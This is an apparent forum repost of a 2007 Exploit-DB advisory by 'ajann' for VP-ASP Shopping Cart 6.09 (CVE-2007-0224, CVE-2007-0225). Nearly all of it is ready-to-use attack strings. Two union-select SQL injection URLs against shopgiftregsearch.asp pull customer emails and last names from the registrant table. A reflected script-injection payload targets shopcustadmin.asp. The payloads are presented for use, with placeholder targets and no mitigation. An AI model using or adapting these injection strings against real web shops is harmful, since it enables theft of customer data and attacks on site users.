- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3115
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-0225 cve-2007-0224
- Дата публикации
- 2007-01-11
Код:
*******************************************************************************
# Title : VP-ASP Shopping Cart 6.09 Remote Multiple Vulnerabilities
# Author : ajann
# Contact : :(
# S.Page : http://www.vpasp.com
# $$ : $49.00 - $350.00 - $495.00
*******************************************************************************
[[SQL]]]---------------------------------------------------------
http://[target]/[path]//shopgiftregsearch.asp?LoginLastname=[SQL]
Example:
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
//shopgiftregsearch.asp?LoginLastname='%20union%20select%200,lastname,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20registrant%20where%20'1=1
This Informations go to login page.
[[/SQL]]
[[XSS]]]---------------------------------------------------------
http://[target]/[path]//shopcustadmin.asp?msg=[XSS]
Example:
//shopcustadmin.asp?msg=%3Cscript%3Ealert('x');%3C/script%3E
[[/XSS]]
"""""""""""""""""""""
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2007-01-11]- Источник
- www.exploit-db.com
